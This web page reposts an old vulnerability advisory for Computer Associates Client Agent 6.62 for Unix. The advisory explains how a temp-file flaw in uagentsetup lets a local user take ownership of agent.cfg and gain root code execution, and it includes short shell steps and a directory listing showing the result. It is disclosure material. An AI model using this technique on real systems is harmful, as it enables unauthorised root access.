Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

clientagent662.txt

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 4
clientagent662.txt
clientagent662.txt
clientagent662.txt

Client Agent 6.62 for Unix Vulnerability
Tested on a Debian 2.2.14

Introduction
--------------
Client clientagent662.txt

Client Agent 6.62 for Unix Vulnerability
Tested on a Debian 2.2.14

Introduction
--------------
Client Agent has a hole allowing to execute an arbitrary code by root
without its knowing. In the meantime, some conditions are necessary to
exploit this vulnerability.

Description
------------
Client Agent is used with ARCserveIT, the safe software. It must be installed
on all the workstations. A global configuration file agent.cfg keep every
sub-agents installed on your system. This file is in /usr/CYEagent, and receive
the information from the sub-agent when the script /opt/uagent/uagensetup is run.

uagent.cfg:

debian:/usr/CYEagent# more agent.cfg
#
#(c) Copyright 1989-1999 Computer Associates International, Inc.
#and/or its subsidiaries. All Rights Reserved. Use by the United
#States Government is subject to RESTRICTED RIGHTS as set out in
#the license agreement.
#

[0]
#[UAGENT]
NAME Uagent
VERSION 5.0.0
HOME /opt/uagent
#ENV CHEY_ENV_DEBUG_LEVEL=4
ENV LD_LIBRARY_PATH=/usr/local/CAlib:/usr/CYEagent:$LD_LIBRARY_PATH
ENV SHLIB_PATH=/usr/local/CAlib:/usr/CYEagent:$SHLIB_PATH
ENV LIBPATH=/usr/local/CAlib:/usr/CYEagent:$LIBPATH
BROWSER asbr
AGENT uagentd
MERGE umrgd
VERIFY umrgd

where asbr, uagentd, and umgrd are programms in /opt/uagent

Client Agent is vulnerable only if uagentsetup is run a second time. The first time,
it creates the folder /usr/CYEagent and the file agent.cfg, but after it creates
a backup of agent.cfg and creates a new agent.cfg without checking permissions.

The code in /opt/uagent/uagentsetup :

# append lines
#
case $ANS in
y|Y|yes|YES|Yes)
cat ${UAGENT_HOME}/.agent.cfg >> ${TMPFILE} || exit 2
${ECHO} >> ${TMPFILE} || exit 2
mv ${TMPFILE} $dest || exit 2 <------------
;;
esac

So anyone can control this file. The modifications to this file will be used when
the sub-agent will be stopped and restarted.

Exploit
--------

[zorgon@debian /]$ cd /tmp
[zorgon@debian /tmp]$ touch uagent.tmp
[zorgon@debian /tmp]$ chmod 700 uagent.tmp

If uagentsetup is run a second time :

[zorgon@debian /]$ ls -lag /usr/CYEagent/
total 176
drwxr-xr-x 3 root root 4096 Jul 19 17:46 .
drwxr-xr-x 15 root root 4096 Jul 11 10:37 ..
-rw-r--r-- 1 zorgon users 618 Jul 19 17:47 agent.cfg
-rw-r--r-- 1 root root 618 Jul 19 17:47 agent.cfg.old
-rwxr-xr-x 1 root root 16899 Jul 11 10:37 asagent
-rwxr-xr-x 1 root root 105280 Jul 11 10:37 asagentd
lrwxrwxrwx 1 root root 11 Jul 12 10:54 li -> /usr/lib/li
-rwxr-xr-x 1 root root 27878 Jul 19 17:47 libarclic98_api.so
drwxr-xr-x 3 root root 4096 Jul 11 10:37 nls
[zorgon@debian /]$



==================================
zorgon <This email address is being protected from spambots. You need JavaScript enabled to view it.>
http://www.nightbird.free.fr
----------------------
Do you do Linux? :)
Get your FREE @linuxstart.com email address at: http://www.linuxstart.com
Social Media Share